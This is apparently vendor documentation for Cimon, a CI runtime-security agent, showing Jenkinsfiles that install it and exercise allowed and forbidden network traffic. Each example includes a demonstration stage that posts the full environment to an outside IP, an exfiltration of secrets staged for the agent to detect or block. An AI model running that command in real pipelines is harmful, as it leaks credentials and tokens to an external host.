Jenkins (Beta)
Jenkins does not offer out-of-the-box hosted runners like GitHub Actions and Azure Pipelines, but provides great flexibility to use self-hosted runners of varying execution types.
Jenkins Self-Hosted Runners Support
In Jenkins, there are two types of execution. Creating virtual or physical nodes that will execute jobs, or setting up a cloud (e.g., Docker-based, K8s-based, etc.) that will provision the job.
Both cases require the underlying operating system to support the minimal requirements for running eBPF code and loading it. You can find more information in the self-hosted support and troubleshooting section.
Cimon Jenkins Pipeline
Jenkins supports running Cimon on all major pipeline types - "Freestyle project", "Pipeline", and "Multibranch Pipeline". As an example, here is a Jenkinsfile that creates a build and runs Cimon:
- Detect Mode
- Prevent Mode
pipeline {
agent any
environment {
CIMON_CLIENT_ID = credentials("cimon-client-id")
CIMON_SECRET = credentials("cimon-secret")
}
options {
disableConcurrentBuilds()
}
stages {
stage('Run Cimon') {
steps {
sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
}
}
stage('Test') {
steps {
sh 'git clone https://github.com/octocat/Hello-World Hello-World'
}
}
stage('Allowed network traffic') {
steps {
sh 'curl -sm 1 https://34.121.34.97 || true'
}
}
stage('Allowed network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://cycode.com || true'
sh 'wget --quiet --timeout 1 https://registry.npmjs.org || true'
}
}
stage('Forbidden network traffic (IP)') {
steps {
sh 'curl -sm 1 -d "$(env)" https://34.121.34.100/upload/v2 || true'
}
}
stage('Forbidden network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://yahoo.com || true'
}
}
}
post {
always {
cleanWs()
sh """
curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
"""
}
}
}
Explanation:
environment {
CIMON_CLIENT_ID = credentials("cimon-client-id")
CIMON_SECRET = credentials("cimon-secret")
}
Cimon receives input parameters through environment variables. Security policies will be configured by these variables.
options {
disableConcurrentBuilds()
}
To enforce Cimon installation step running first, this configuration option must be enabled.
stage('Run Cimon') {
steps {
sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
}
}
Installing Cimon agent on the runner.
post {
always {
cleanWs()
sh """
curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
"""
}
}
Cimon agent is stopped, and the report is printed.
pipeline {
agent any
environment {
CIMON_PREVENT = "1"
CIMON_ALLOWED_HOSTS = """
github.com
registry.npmjs.org
cycode.com
"""
CIMON_ALLOWED_IPS = """
34.121.34.97
"""
}
options {
disableConcurrentBuilds()
}
stages {
stage('Run Cimon') {
steps {
sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
}
}
stage('Test') {
steps {
sh 'git clone https://github.com/octocat/Hello-World Hello-World'
}
}
stage('Allowed network traffic') {
steps {
sh 'curl -sm 1 https://34.121.34.97 || true'
}
}
stage('Allowed network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://cycode.com || true'
sh 'wget --quiet --timeout 1 https://registry.npmjs.org || true'
}
}
stage('Forbidden network traffic (IP)') {
steps {
sh 'curl -sm 1 -d "$(env)" https://34.121.34.100/upload/v2 || true'
}
}
stage('Forbidden network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://yahoo.com || true'
}
}
}
post {
always {
cleanWs()
sh """
curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
"""
}
}
}
Explanation:
environment {
CIMON_PREVENT = "1"
CIMON_ALLOWED_HOSTS = """
github.com
registry.npmjs.org
cycode.com
"""
CIMON_ALLOWED_IPS = """
34.121.34.97
"""
}
Cimon receives input parameters through environment variables. Security policies will be configured by these variables.
options {
disableConcurrentBuilds()
}
To enforce Cimon installation step running first, this configuration option must be enabled.
stage('Run Cimon') {
steps {
sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
}
}
Installing Cimon agent on the runner.
post {
always {
cleanWs()
sh """
curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
"""
}
}
Cimon agent is stopped, and the report is printed.
Usage
Here are the parameters that are supported:
| Environment Variable | Default | Description |
|---|---|---|
CIMON_CLIENT_ID | Cimon client ID for authentication | |
CIMON_SECRET | Cimon secret for authentication | |
CIMON_URL | Cimon endpoint for authentication | |
CIMON_PREVENT | false | Enable prevention mode |
CIMON_ALLOWED_IPS | A comma or white space separated list of allowed IP addresses | |
CIMON_ALLOWED_HOSTS | A comma or white space separated list of allowed domain names. The left-most label can be the wildcard character (*) to match multiple subdomains (e.g. *.example.com). | |
CIMON_IGNORED_IP_NETS | A comma or white space separated list of ignored IP networks in CIDR notation, e.g. 10.0.0.0/8, 172.16.0.0/12. This setting is mandatory if your workflow runs containers attached to a custom network with configured sub-range. In other words, inter-container networking is usually ignored by Cimon. Cimon implicitly ignores 10.0.0.0/8 and 172.16.0.0/12 networks. | |
CIMON_REPORT_PROCESS_TREE | false | Enable to report the process tree |
CIMON_SLACK_WEBHOOK_ENDPOINT | Slack webhook endpoint to report security events | |
CIMON_LOG_LEVEL | info | Log level (Used for debugging) |
Report
The final report is printed in the build logs of each job by Cimon.